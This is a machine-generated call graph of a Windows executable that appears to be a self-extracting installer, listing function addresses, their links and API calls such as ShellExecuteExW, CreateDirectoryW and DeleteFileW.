10902->10904 10903->10883 10904->10903 8238 4096c7 _EH_prolog 8252 4096fa 8238->8252 8239 40971c 8240 409827 8273 40118a 8240->8273 8242 4094e0 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8242->8252 8243 409851 8246 40985e ??2@YAPAXI 8243->8246 8244 40983c 8324 409425 8244->8324 8247 409878 8246->8247 8253 4098c2 8247->8253 8254 409925 ??2@YAPAXI 8247->8254 8258 409530 3 API calls 8247->8258 8260 409425 ctype 3 API calls 8247->8260 8262 4099a2 8247->8262 8267 409a65 8247->8267 8283 409fb4 8247->8283 8287 408ea4 8247->8287 8330 409c13 ??2@YAPAXI 8247->8330 8332 409f49 8247->8332 8248 40969d 8 API calls 8248->8252 8250 40e959 VirtualFree ??3@YAXPAX free free ctype 8250->8252 8252->8239 8252->8240 8252->8242 8252->8248 8252->8250 8317 4095b7 8252->8317 8321 409403 8252->8321 8327 409530 8253->8327 8254->8247 8258->8247 8260->8247 8263 409530 3 API calls 8262->8263 8264 4099c7 8263->8264 8265 409425 ctype 3 API calls 8264->8265 8265->8239 8269 409530 3 API calls 8267->8269 8270 409a84 8269->8270 8271 409425 ctype 3 API calls 8270->8271 8271->8239 8274 401198 GetDiskFreeSpaceExW 8273->8274 8275 4011ee SendMessageW 8273->8275 8274->8275 8276 4011b0 8274->8276 8277 4011d6 8275->8277 8276->8275 8278 401f9d 19 API calls 8276->8278 8277->8243 8277->8244 8279 4011c9 8278->8279 8280 407717 25 API calls 8279->8280 8281 4011cf 8280->8281 8281->8277 8282 4011e7 8281->8282 8282->8275 8284 409fdd 8283->8284 8336 409dff 8284->8336 8610 40aef3 8287->8610 8290 408ec1 8290->8247 8292 408fd5 8628 408b7c 8292->8628 8293 408f0d ??2@YAPAXI 8302 408ef5 8293->8302 8295 408f31 ??2@YAPAXI 8295->8302 8302->8292 8302->8293 8302->8295 8671 40cdb8 ??2@YAPAXI 8302->8671 8318 4095c6 8317->8318 8320 4095cc 8317->8320 8318->8252 8319 4095e2 _CxxThrowException 8319->8318 8320->8318 8320->8319 8322 40e8e2 4 API calls 8321->8322 8323 40940b 8322->8323 8323->8252 8325 40e8da ctype 3 API calls 8324->8325 8326 409433 8325->8326 8328 408963 ctype 3 API calls 8327->8328 8329 40953b 8328->8329 8331 409c45 8330->8331 8331->8247 8334 409f4e 8332->8334 8333 409f75 8333->8247 8334->8333 8335 409cde 110 API calls 8334->8335 8335->8334 8339 409e04 8336->8339 8337 409e3a 8337->8247 8339->8337 8340 409cde 8339->8340 8341 409cf8 8340->8341 8345 401626 8341->8345 8408 40db1f 8341->8408 8342 409d2c 8342->8339 8346 401642 8345->8346 8352 401638 8345->8352 8411 40a62f _EH_prolog 8346->8411 8348 40166f 8455 40eca9 8348->8455 8349 401411 2 API calls 8351 401688 8349->8351 8353 401962 ??3@YAXPAX 8351->8353 8354 40169d 8351->8354 8352->8342 8358 40eca9 VariantClear 8353->8358 8437 401329 8354->8437 8357 4016a8 8441 401454 8357->8441 8358->8352 8361 401362 2 API calls 8362 4016c7 ??3@YAXPAX 8361->8362 8367 4016d9 8362->8367 8394 401928 ??3@YAXPAX 8362->8394 8364 40eca9 VariantClear 8364->8352 8365 4016fa 8366 40eca9 VariantClear 8365->8366 8368 401702 ??3@YAXPAX 8366->8368 8367->8365 8369 401764 8367->8369 8382 401725 8367->8382 8368->8348 8372 4017a2 8369->8372 8373 401789 8369->8373 8370 40eca9 VariantClear 8371 401737 ??3@YAXPAX 8370->8371 8371->8348 8375 4017c4 GetLocalTime SystemTimeToFileTime 8372->8375 8376 4017aa 8372->8376 8374 40eca9 VariantClear 8373->8374 8377 401791 ??3@YAXPAX 8374->8377 8375->8376 8378 4017e1 8376->8378 8379 4017f8 8376->8379 8376->8382 8377->8348 8459 403354 lstrlenW 8378->8459 8446 40301a GetFileAttributesW 8379->8446 8382->8370 8384 401934 GetLastError 8384->8394 8385 401818 ??2@YAPAXI 8387 401824 8385->8387 8386 40192a 8386->8384 8483 40db53 8387->8483 8390 40190f 8393 40eca9 VariantClear 8390->8393 8391 40185f GetLastError 8486 4012f7 8391->8486 8393->8394 8394->8364 8395 401871 8396 403354 86 API calls 8395->8396 8399 40187f ??3@YAXPAX 8395->8399 8397 4018cc 8396->8397 8397->8399 8401 40db53 2 API calls 8397->8401 8400 40189c 8399->8400 8402 40eca9 VariantClear 8400->8402 8403 4018f1 8401->8403 8404 4018aa ??3@YAXPAX 8402->8404 8405 4018f5 GetLastError 8403->8405 8406 401906 ??3@YAXPAX 8403->8406 8404->8348 8405->8399 8406->8390 8602 40da56 8408->8602 8412 40a738 8411->8412 8413 40a66a 8411->8413 8414 40a687 8412->8414 8415 40a73d 8412->8415 8413->8414 8416 40a704 8413->8416 8417 40a679 8413->8417 8423 40a6ad 8414->8423 8515 40a3b0 8414->8515 8420 40a747 8415->8420 8422 40a699 8415->8422 8424 40a6f2 8415->8424 8416->8423 8489 40e69c 8416->8489 8418 40a67e 8417->8418 8417->8424 8427 40a684 8418->8427 8435 40a6b2 8418->8435 8420->8424 8420->8435 8422->8423 8503 40ed59 8422->8503 8498 40ecae 8423->8498 8511 40ed34 8424->8511 8426 40a71a 8492 40eced 8426->8492 8427->8414 8427->8422 8433 40eca9 VariantClear 8434 40166b 8433->8434 8434->8348 8434->8349 8435->8423 8507 40ed79 8435->8507 8438 401340 8437->8438 8439 40112b 2 API calls 8438->8439 8440 40134b 8439->8440 8440->8357 8442 4012f7 2 API calls 8441->8442 8443 401462 8442->8443 8530 4013e2 8443->8530 8445 40146d 8445->8361 8447 403037 8446->8447 8453 401804 8446->8453 8448 403048 8447->8448 8449 40303b SetLastError 8447->8449 8450 403051 8448->8450 8452 40305f FindFirstFileW 8448->8452 8448->8453 8449->8453 8533 402fed 8450->8533 8452->8450 8454 403072 FindClose CompareFileTime 8452->8454 8453->8384 8453->8385 8453->8386 8454->8450 8454->8453 8456 40ec65 8455->8456 8457 40ec86 VariantClear 8456->8457 8458 40ec9d 8456->8458 8457->8352 8458->8352 8460 4024fc 2 API calls 8459->8460 8461 403375 8460->8461 8462 40112b 2 API calls 8461->8462 8465 403385 8461->8465 8462->8465 8464 4033d3 GetSystemTimeAsFileTime GetFileAttributesW 8466 4033e8 8464->8466 8467 4033f2 8464->8467 8465->8464 8474 403477 8465->8474 8574 401986 CreateDirectoryW 8465->8574 8468 40301a 22 API calls 8466->8468 8469 401986 4 API calls 8467->8469 8479 4033f8 ??3@YAXPAX 8467->8479 8468->8467 8482 403405 8469->8482 8470 4034a7 8471 407776 55 API calls 8470->8471 8477 4034b1 ??3@YAXPAX 8471->8477 8472 40340a 8580 407776 8472->8580 8474->8470 8474->8479 8475 40346b ??3@YAXPAX 8480 4034bc 8475->8480 8476 40341d memcpy 8476->8482 8477->8480 8479->8480 8480->8382 8481 401986 4 API calls 8481->8482 8482->8472 8482->8475 8482->8476 8482->8481 8599 40db3c 8483->8599 8487 40112b 2 API calls 8486->8487 8488 401311 8487->8488 8488->8395 8490 4012f7 2 API calls 8489->8490 8491 40e6a9 8490->8491 8491->8426 8519 40ecd7 8492->8519 8495 40ed12 8496 40a726 ??3@YAXPAX 8495->8496 8497 40ed17 _CxxThrowException 8495->8497 8496->8423 8497->8496 8522 40ec65 8498->8522 8500 40ecba 8501 40a7b2 8500->8501 8502 40ecbe memcpy 8500->8502 8501->8433 8502->8501 8504 40ed62 8503->8504 8505 40ed67 8503->8505 8506 40ecd7 VariantClear 8504->8506 8505->8423 8506->8505 8508 40ed82 8507->8508 8509 40ed87 8507->8509 8510 40ecd7 VariantClear 8508->8510 8509->8423 8510->8509 8512 40ed42 8511->8512 8513 40ed3d 8511->8513 8512->8423 8514 40ecd7 VariantClear 8513->8514 8514->8512 8516 40a3c2 8515->8516 8517 40a3de 8516->8517 8526 40eda0 8516->8526 8517->8423 8520 40eca9 VariantClear 8519->8520 8521 40ecdf SysAllocString 8520->8521 8521->8495 8521->8496 8523 40ec6d 8522->8523 8524 40ec86 VariantClear 8523->8524 8525 40ec9d 8523->8525 8524->8500 8525->8500 8527 40edae 8526->8527 8528 40eda9 8526->8528 8527->8517 8529 40ecd7 VariantClear 8528->8529 8529->8527 8531 401398 2 API calls 8530->8531 8532 4013f2 8531->8532 8532->8445 8539 402c86 8533->8539 8535 402ff6 8536 403017 8535->8536 8537 402ffb GetLastError 8535->8537 8536->8453 8538 403006 8537->8538 8538->8453 8540 402c93 GetFileAttributesW 8539->8540 8541 402c8f 8539->8541 8542 402ca4 8540->8542 8543 402ca9 8540->8543 8541->8535 8542->8535 8544 402cc7 8543->8544 8545 402cad SetFileAttributesW 8543->8545 8550 402b79 8544->8550 8547 402cc3 8545->8547 8548 402cba DeleteFileW 8545->8548 8547->8535 8548->8535 8551 4024fc 2 API calls 8550->8551 8552 402b90 8551->8552 8553 40254d 2 API calls 8552->8553 8554 402b9d FindFirstFileW 8553->8554 8555 402c55 SetFileAttributesW 8554->8555 8570 402bbf 8554->8570 8557 402c60 RemoveDirectoryW 8555->8557 8558 402c78 ??3@YAXPAX 8555->8558 8556 401329 2 API calls 8556->8570 8557->8558 8559 402c6d ??3@YAXPAX 8557->8559 8560 402c80 8558->8560 8559->8560 8560->8535 8562 40254d 2 API calls 8562->8570 8563 402c24 SetFileAttributesW 8563->8558 8567 402c2d DeleteFileW 8563->8567 8564 402bef lstrcmpW 8565 402c05 lstrcmpW 8564->8565 8566 402c38 FindNextFileW 8564->8566 8565->8566 8565->8570 8568 402c4e FindClose 8566->8568 8566->8570 8567->8570 8568->8555 8569 402b79 2 API calls 8569->8570 8570->8556 8570->8558 8570->8562 8570->8563 8570->8564 8570->8566 8570->8569 8571 401429 8570->8571 8572 401398 2 API calls 8571->8572 8573 401433 8572->8573 8573->8570 8575 4019c7 8574->8575 8576 401997 GetLastError 8574->8576 8575->8465 8577 4019b1 GetFileAttributesW 8576->8577 8579 4019a6 8576->8579 8577->8575 8577->8579 8578 4019a7 SetLastError 8578->8465 8579->8575 8579->8578 8581 401f9d 19 API calls 8580->8581 8582 40778a wvsprintfW 8581->8582 8583 407859 8582->8583 8584 4077ab GetLastError FormatMessageW 8582->8584 8587 4076a8 25 API calls 8583->8587 8585 4077d9 FormatMessageW 8584->8585 8586 4077ee lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 8584->8586 8585->8583 8585->8586 8591 4076a8 8586->8591 8590 407865 8587->8590 8590->8479 8592 407715 ??3@YAXPAX LocalFree 8591->8592 8593 4076b7 8591->8593 8592->8590 8594 40661a 2 API calls 8593->8594 8595 4076c6 IsWindow 8594->8595 8596 4076ef 8595->8596 8597 4076dd IsBadReadPtr 8595->8597 8598 4073d1 21 API calls 8596->8598 8597->8596 8598->8592 8600 40db1f 2 API calls 8599->8600 8601 401857 8600->8601 8601->8390 8601->8391 8607 40d985 8602->8607 8605 40da65 CreateFileW 8606 40da8a 8605->8606 8606->8342 8608 40d98f CloseHandle 8607->8608 8609 40d99a 8607->8609 8608->8609 8609->8605 8609->8606 8611 40af0c 8610->8611 8626 408ebd 8610->8626 8611->8626 8701 40ac7a 8611->8701 8613 40af3f 8614 40ac7a 7 API calls 8613->8614 8615 40b0cb 8613->8615 8619 40af96 8614->8619 8617 40e959 ctype 4 API calls 8615->8617 8616 40afbd 8708 40e959 8616->8708 8617->8626 8619->8615 8619->8616 8620 40b043 8621 40e959 ctype 4 API calls 8620->8621 8624 40b07f 8621->8624 8622 408761 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8623 40afc6 8622->8623 8623->8620 8623->8622 8625 40e959 ctype 4 API calls 8624->8625 8625->8626 8626->8290 8627 4065ea InitializeCriticalSection 8626->8627 8627->8302 8720 4086f0 8628->8720 8672 40cdc7 8671->8672 8673 408761 4 API calls 8672->8673 8674 40cdde 8673->8674 8674->8302 8702 40e8da ctype 3 API calls 8701->8702 8703 40ac86 8702->8703 8712 40e811 8703->8712 8705 40aca2 8705->8613 8706 409403 4 API calls 8707 40ac90 8706->8707 8707->8705 8707->8706 8709 40e93b 8708->8709 8710 40e8da ctype 3 API calls 8709->8710 8711 40e943 ??3@YAXPAX 8710->8711 8711->8623 8713 40e8a5 8712->8713 8714 40e824 8712->8714 8713->8707 8715 40e833 _CxxThrowException 8714->8715 8716 40e863 ??2@YAPAXI 8714->8716 8717 40e895 ??3@YAXPAX 8714->8717 8715->8714 8716->8714 8718 40e879 memcpy 8716->8718 8717->8713 8718->8717 8721 40e8da ctype 3 API calls 8720->8721 8722 4086f8 8721->8722 8723 40e8da ctype 3 API calls 8722->8723 8724 408700 8723->8724 8725 40e8da ctype 3 API calls 8724->8725 8726 408708 8725->8726 9015 40dace 9018 40daac 9015->9018 9021 40da8f 9018->9021 9022 40da56 2 API calls 9021->9022 9023 40daa9 9022->9023 9005 40dadc ReadFile 9024 411def __set_app_type __p__fmode __p__commode 9025 411e5e 9024->9025 9026 411e72 9025->9026 9027 411e66 __setusermatherr 9025->9027 9036 411f66 _controlfp 9026->9036 9027->9026 9029 411e77 _initterm __getmainargs _initterm 9030 411ecb GetStartupInfoA 9029->9030 9032 411eff GetModuleHandleA 9030->9032 9037 4064af _EH_prolog 9032->9037 9036->9029 9040 404faa 9037->9040 9345 401b37 GetModuleHandleW CreateWindowExW 9040->9345 9043 404fdc 9044 40648e MessageBoxA 9043->9044 9046 404ff6 9043->9046 9045 4064a5 exit _XcptFilter 9044->9045 9047 401411 2 API calls 9046->9047 9048 40502d 9047->9048 9049 401411 2 API calls 9048->9049 9050 405035 9049->9050 9348 403e23 9050->9348 9055 40254d 2 API calls 9056 405073 9055->9056 9357 402a69 9056->9357 9058 40507c 9371 403d71 9058->9371 9061 40509b _wtol 9063 4050b1 9061->9063 9376 404405 9063->9376 9064 4050d6 9065 403d71 6 API calls 9064->9065 9066 4050e1 9065->9066 9067 4050e7 9066->9067 9068 405118 9066->9068 9543 404996 9067->9543 9069 405130 GetModuleFileNameW 9068->9069 9071 40112b 2 API calls 9068->9071 9072 405151 9069->9072 9073 405142 9069->9073 9071->9069 9078 403d71 6 API calls 9072->9078 9075 407776 55 API calls 9073->9075 9074 4050ee ??3@YAXPAX 9561 403e70 9074->9561 9083 4050ec 9075->9083 9077 4050ff ??3@YAXPAX ??3@YAXPAX 9077->9045 9090 405173 9078->9090 9079 4052d5 9080 401362 2 API calls 9079->9080 9081 4052e5 9080->9081 9082 401362 2 API calls 9081->9082 9087 4052f2 9082->9087 9083->9074 9084 4051fa 9084->9083 9085 40522a 9084->9085 9089 405213 _wtol 9084->9089 9086 403d71 6 API calls 9085->9086 9095 405289 9086->9095 9088 40538d ??2@YAPAXI 9087->9088 9091 401329 2 API calls 9087->9091 9097 405399 9088->9097 9089->9085 9090->9079 9090->9083 9090->9084 9090->9085 9094 401429 2 API calls 9090->9094 9092 405327 9091->9092 9093 401329 2 API calls 9092->9093 9099 40533d 9093->9099 9094->9090 9095->9079 9096 404594 2 API calls 9095->9096 9098 4052ba 9096->9098 9100 4053cf 9097->9100 9104 407776 55 API calls 9097->9104 9098->9079 9102 401362 2 API calls 9098->9102 9103 401362 2 API calls 9099->9103 9401 4025ae 9100->9401 9102->9079 9106 405367 9103->9106 9104->9100 9108 401f9d 19 API calls 9106->9108 9107 4025ae 2 API calls 9110 4053f6 9107->9110 9109 40536e 9108->9109 9111 40254d 2 API calls 9109->9111 9112 4025ae 2 API calls 9110->9112 9113 405377 9111->9113 9114 4053fe 9112->9114 9113->9088 9404 404e3f 9114->9404 9119 40546f 9121 405534 9119->9121 9124 403d71 6 API calls 9119->9124 9120 402844 10 API calls 9122 405441 9120->9122 9123 40e8da ctype 3 API calls 9121->9123 9122->9119 9127 407776 55 API calls 9122->9127 9125 40553c 9123->9125 9126 405493 9124->9126 9128 405573 9125->9128 9592 403093 9125->9592 9126->9121 9134 40549d 9126->9134 9129 405450 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9127->9129 9131 405506 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9128->9131 9132 40557c 9128->9132 9129->9119 9131->9074 9131->9083 9136 405588 wsprintfW 9132->9136 9137 4055ed 9132->9137 9143 401411 2 API calls 9132->9143 9144 401329 ??2@YAPAXI ??3@YAXPAX 9132->9144 9147 401f9d 19 API calls 9132->9147 9626 402f6c ??2@YAPAXI 9132->9626 9632 402425 ??3@YAXPAX ??3@YAXPAX 9132->9632 9134->9131 9566 404cbc 9134->9566 9135 405556 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9138 4054f5 9135->9138 9139 401411 2 API calls 9136->9139 9432 404603 9137->9432 9138->9131 9139->9132 9142 4054cc 9142->9131 9145 407776 55 API calls 9142->9145 9143->9132 9144->9132 9146 4054da ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9145->9146 9146->9138 9147->9132 9148 40584a 9149 404603 26 API calls 9148->9149 9182 40586a 9149->9182 9151 403b94 lstrlenW lstrlenW _wcsnicmp 9176 4055f6 9151->9176 9154 405933 9494 404034 9154->9494 9155 4024fc 2 API calls 9155->9182 9159 4059d8 CoInitialize 9166 40243b lstrcmpW 9159->9166 9160 40595a 9163 40243b lstrcmpW 9160->9163 9161 405935 ??3@YAXPAX 9161->9154 9165 405969 9163->9165 9164 401411 ??2@YAPAXI ??3@YAXPAX 9164->9182 9167 405979 9165->9167 9169 401f9d 19 API calls 9165->9169 9168 4059fe 9166->9168 9659 403b40 9167->9659 9170 405a12 9168->9170 9173 401329 2 API calls 9168->9173 9169->9167 9500 403b59 9170->9500 9172 401362 2 API calls 9172->9182 9173->9170 9176->9148 9176->9151 9192 4057dd _wtol 9176->9192 9208 405878 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9176->9208 9633 40484d 9176->9633 9644 40408b 9176->9644 9178 4073d1 21 API calls 9181 40599c ctype 9178->9181 9179 401329 2 API calls 9179->9182 9180 405a4d 9184 405a2b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9180->9184 9222 405a61 9180->9222 9679 4082e9 9180->9679 9185 4059a7 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9181->9185 9182->9154 9182->9155 9182->9161 9182->9164 9182->9172 9182->9179 9187 402f6c 7 API calls 9182->9187 9491 40243b 9182->9491 9658 402425 ??3@YAXPAX ??3@YAXPAX 9182->9658 9184->9180 9185->9083 9187->9182 9189 405910 ??3@YAXPAX 9189->9182 9190 401411 2 API calls 9190->9222 9192->9176 9193 405bd8 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213 405bf3 9193->9213 9194 405a9f GetKeyState 9194->9222 9195 405c6c 9197 405ca2 9195->9197 9198 405c74 9195->9198 9196 40243b lstrcmpW 9196->9222 9201 4012f7 2 API calls 9197->9201 9721 403f85 9198->9721 9202 405cb0 9201->9202 9205 403b59 15 API calls 9202->9205 9209 405cb9 9205->9209 9206 407776 55 API calls 9210 405c13 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9206->9210 9207 401362 2 API calls 9211 405c91 ??3@YAXPAX 9207->9211 9208->9083 9212 405cca ??3@YAXPAX 9209->9212 9216 401362 2 API calls 9209->9216 9210->9213 9217 405cd9 9211->9217 9212->9217 9213->9206 9214 405c4a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9213->9214 9214->9213 9215 405bcd ??3@YAXPAX 9215->9222 9216->9212 9219 405d24 9217->9219 9220 405d16 9217->9220 9218 401329 ??2@YAPAXI ??3@YAXPAX 9218->9222 9734 40786b 9219->9734 9507 404a44 9220->9507 9222->9190 9222->9193 9222->9194 9222->9195 9222->9196 9222->9213 9222->9214 9222->9215 9222->9218 9224 401429 ??2@YAPAXI ??3@YAXPAX 9222->9224 9706 407613 9222->9706 9715 407674 9222->9715 9224->9222 9225 405d20 9226 405d65 9225->9226 9740 403e0d 9225->9740 9227 404034 21 API calls 9226->9227 9229 405d77 9227->9229 9231 401411 2 API calls 9229->9231 9232 406373 9229->9232 9233 405d95 9231->9233 9234 4063f7 ctype 9232->9234 9237 40243b lstrcmpW 9232->9237 9277 405da8 9233->9277 9744 40453e 9233->9744 9236 40643a ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9234->9236 9242 40243b lstrcmpW 9234->9242 9239 406461 9236->9239 9240 406467 ??3@YAXPAX 9236->9240 9238 4063a4 9237->9238 9238->9234 9761 403f48 9238->9761 9239->9240 9241 403e70 ctype 4 API calls 9240->9241 9243 406478 ??3@YAXPAX ??3@YAXPAX 9241->9243 9245 406416 9242->9245 9243->9045 9244 401411 ??2@YAPAXI ??3@YAXPAX 9244->9277 9245->9236 9249 406423 9245->9249 9248 405dd8 9252 405de5 9248->9252 9253 4061fa ??3@YAXPAX ??3@YAXPAX 9248->9253 9250 4012f7 2 API calls 9249->9250 9255 406432 9250->9255 9251 4073d1 21 API calls 9256 4063e0 ??3@YAXPAX 9251->9256 9753 4043c6 9252->9753 9257 406312 9253->9257 9254 40243b lstrcmpW 9254->9277 9766 404aff 9255->9766 9256->9234 9260 40636a ??3@YAXPAX 9257->9260 9263 404034 21 API calls 9257->9263 9259 405e45 9265 401329 2 API calls 9259->9265 9260->9232 9268 406321 9263->9268 9269 405e4e 9265->9269 9266 4043c6 2 API calls 9267 405e0e 9266->9267 9270 401362 2 API calls 9267->9270 9533 4048ab 9268->9533 9274 403b7f 19 API calls 9269->9274 9275 405e1a ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9270->9275 9272 40626b ??3@YAXPAX ??3@YAXPAX 9272->9257 9273 401329 2 API calls 9273->9277 9290 405e57 9274->9290 9278 406211 9275->9278 9279 405e41 9275->9279 9276 40633a SetCurrentDirectoryW 9280 4048ab 4 API calls 9276->9280 9277->9244 9277->9248 9277->9254 9277->9259 9277->9272 9277->9273 9281 401429 2 API calls 9277->9281 9284 403e0d 16 API calls 9278->9284 9279->9259 9282 406362 9280->9282 9283 405ee5 ??3@YAXPAX ??3@YAXPAX 9281->9283 9285 403e0d 16 API calls 9282->9285 9283->9277 9286 406216 9284->9286 9285->9260 9287 407776 55 API calls 9286->9287 9288 40621f 7 API calls 9287->9288 9289 40625e 9288->9289 9289->9272 9291 405f61 _wtol 9290->9291 9292 403bce lstrlenW lstrlenW _wcsnicmp 9290->9292 9293 406025 9290->9293 9291->9290 9292->9290 9294 406080 9293->9294 9295 40602e 9293->9295 9296 401362 2 API calls 9294->9296 9297 406053 9295->9297 9298 406034 9295->9298 9299 40607e 9296->9299 9301 401329 2 API calls 9297->9301 9300 401329 2 API calls 9298->9300 9302 40254d 2 API calls 9299->9302 9303 40603f 9300->9303 9304 406051 9301->9304 9305 406092 9302->9305 9306 40254d 2 API calls 9303->9306 9307 40243b lstrcmpW 9304->9307 9308 401411 2 API calls 9305->9308 9309 406048 9306->9309 9310 406068 9307->9310 9311 40609a 9308->9311 9312 40254d 2 API calls 9309->9312 9310->9305 9314 40254d 2 API calls 9310->9314 9313 401411 2 API calls 9311->9313 9312->9304 9315 4060a2 memset 9313->9315 9314->9299 9316 4060e1 9315->9316 9317 404594 2 API calls 9316->9317 9318 4060fe 9317->9318 9319 401329 2 API calls 9318->9319 9320 406109 9319->9320 9321 403b7f 19 API calls 9320->9321 9322 406112 9321->9322 9323 4061b1 9322->9323 9527 4021ed 9322->9527 9325 4062ee ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9325 9327 4061c5 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9323->9327 9325->9257 9327->9253 9328 406150 9330 403b7f 19 API calls 9328->9330 9329 401429 2 API calls 9331 406147 9329->9331 9332 406168 ShellExecuteExW 9330->9332 9334 40254d 2 API calls 9331->9334 9335 406282 9332->9335 9336 40618c 9332->9336 9334->9328 9339 407776 55 API calls 9335->9339 9337 4061a0 CloseHandle 9336->9337 9338 406192 WaitForSingleObject 9336->9338 9758 402185 9337->9758 9338->9337 9341 40628c 9339->9341 9342 403e0d 16 API calls 9341->9342 9343 406291 9 API calls 9342->9343 9344 4062e1 9343->9344 9344->9325 9346 401b6c SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9345->9346 9347 401b9f GetVersionExW 9345->9347 9346->9347 9347->9043 9347->9044 9349 40112b 2 API calls 9348->9349 9350 403e38 GetCommandLineW 9349->9350 9351 404594 9350->9351 9352 4045ce 9351->9352 9355 4045a2 9351->9355 9354 401429 2 API calls 9352->9354 9356 4045c6 9352->9356 9353 401429 2 API calls 9353->9355 9354->9352 9355->9353 9355->9356 9356->9055 9358 401411 2 API calls 9357->9358 9364 402a79 9358->9364 9359 401362 2 API calls 9360 402b6c ??3@YAXPAX 9359->9360 9360->9058 9361 402b5f 9361->9359 9363 401411 2 API calls 9363->9364 9364->9361 9364->9363 9365 401429 ??2@YAPAXI ??3@YAXPAX 9364->9365 9367 401362 2 API calls 9364->9367 9805 4025c6 9364->9805 9808 40272e 9364->9808 9365->9364 9368 402ad9 ??3@YAXPAX 9367->9368 9369 4013e2 2 API calls 9368->9369 9370 402aee ??3@YAXPAX ??3@YAXPAX 9369->9370 9370->9364 9372 403d80 9371->9372 9373 403dbd 9372->9373 9374 403d9a lstrlenW lstrlenW 9372->9374 9373->9061 9373->9063 9819 401a85 9374->9819 9377 401f47 3 API calls 9376->9377 9378 404416 9377->9378 9379 401f9d 19 API calls 9378->9379 9380 40441d 9379->9380 9381 401f9d 19 API calls 9380->9381 9382 404429 9381->9382 9383 401f9d 19 API calls 9382->9383 9384 404435 9383->9384 9385 401f9d 19 API calls 9384->9385 9386 404441 9385->9386 9387 401f9d 19 API calls 9386->9387 9388 40444d 9387->9388 9389 401f9d 19 API calls 9388->9389 9390 404459 9389->9390 9391 401f9d 19 API calls 9390->9391 9392 404465 9391->9392 9393 404480 SHGetSpecialFolderPathW 9392->9393 9396 404533 #17 9392->9396 9397 401411 2 API calls 9392->9397 9398 401329 ??2@YAPAXI ??3@YAXPAX 9392->9398 9400 402f6c 7 API calls 9392->9400 9824 402425 ??3@YAXPAX ??3@YAXPAX 9392->9824 9393->9392 9394 40449a wsprintfW 9393->9394 9395 401411 2 API calls 9394->9395 9395->9392 9396->9064 9397->9392 9398->9392 9400->9392 9402 4022b0 2 API calls 9401->9402 9403 4025c2 9402->9403 9403->9107 9825 403e86 9404->9825 9406 404e56 9407 403e86 2 API calls 9406->9407 9408 404e65 9407->9408 9829 404343 9408->9829 9412 404e82 ??3@YAXPAX 9413 404343 3 API calls 9412->9413 9414 404e9d 9413->9414 9415 403ec1 2 API calls 9414->9415 9416 404ea8 ??3@YAXPAX wsprintfA 9415->9416 9845 403ef6 9416->9845 9418 404ed0 9419 403ef6 2 API calls 9418->9419 9420 404edb 9419->9420 9421 402844 9420->9421 9422 402851 9421->9422 9430 40dcfb 3 API calls 9422->9430 9423 402863 lstrlenA lstrlenA 9428 402890 9423->9428 9424 40296e 9424->9119 9424->9120 9425 40293b memmove 9425->9424 9425->9428 9426 4028db memcmp 9426->9424 9426->9428 9427 402918 memcmp 9427->9428 9428->9424 9428->9425 9428->9426 9428->9427 9431 40dcc7 GetLastError 9428->9431 9856 402640 9428->9856 9430->9423 9431->9428 9433 40243b lstrcmpW 9432->9433 9434 40461c 9433->9434 9435 40466c 9434->9435 9437 401329 2 API calls 9434->9437 9436 40243b lstrcmpW 9435->9436 9438 40468a 9436->9438 9439 404633 9437->9439 9442 40243b lstrcmpW 9438->9442 9440 401f9d 19 API calls 9439->9440 9441 40463a 9440->9441 9444 40254d 2 API calls 9441->9444 9443 4046a2 9442->9443 9446 40243b lstrcmpW 9443->9446 9445 404643 9444->9445 9447 401329 2 API calls 9445->9447 9448 4046ba 9446->9448 9449 40465c 9447->9449 9451 40243b lstrcmpW 9448->9451 9450 401f9d 19 API calls 9449->9450 9452 404663 9450->9452 9453 4046d2 9451->9453 9454 40254d 2 API calls 9452->9454 9455 4046e9 9453->9455 9456 4046d9 lstrcmpiW 9453->9456 9454->9435 9457 40243b lstrcmpW 9455->9457 9456->9455 9458 4046ff 9457->9458 9459 40243b lstrcmpW 9458->9459 9460 40472c 9459->9460 9461 404739 9460->9461 9859 403d1f 9460->9859 9463 40243b lstrcmpW 9461->9463 9467 40474d 9463->9467 9464 40476d 9465 40243b lstrcmpW 9464->9465 9472 404780 9465->9472 9467->9464 9468 40243b lstrcmpW 9467->9468 9863 403cc6 9467->9863 9468->9467 9469 4047a0 9471 40243b lstrcmpW 9469->9471 9473 4047ac 9471->9473 9472->9469 9474 40243b lstrcmpW 9472->9474 9867 403cf7 9472->9867 9475 40243b lstrcmpW 9473->9475 9474->9472 9476 4047bd 9475->9476 9477 40243b lstrcmpW 9476->9477 9478 4047ce 9477->9478 9479 4047e4 9478->9479 9480 4047db _wtol 9478->9480 9481 40243b lstrcmpW 9479->9481 9480->9479 9482 4047f0 9481->9482 9483 404800 9482->9483 9484 4047f7 _wtol 9482->9484 9485 40243b lstrcmpW 9483->9485 9484->9483 9486 40480c 9485->9486 9487 40243b lstrcmpW 9486->9487 9488 404824 9487->9488 9489 40243b lstrcmpW 9488->9489 9490 40483c 9489->9490 9490->9176 9875 4023dd 9491->9875 9495 404045 9494->9495 9496 404088 9494->9496 9497 4012f7 2 API calls 9495->9497 9498 403b7f 19 API calls 9495->9498 9496->9159 9496->9160 9497->9495 9499 404062 SetEnvironmentVariableW ??3@YAXPAX 9498->9499 9499->9495 9499->9496 9501 40393b 7 API calls 9500->9501 9502 403b69 9501->9502 9503 4039f6 7 API calls 9502->9503 9504 403b74 9503->9504 9505 4027c7 6 API calls 9504->9505 9506 403b7a 9505->9506 9506->9180 9662 4083b6 9506->9662 9879 408676 9507->9879 9509 404a55 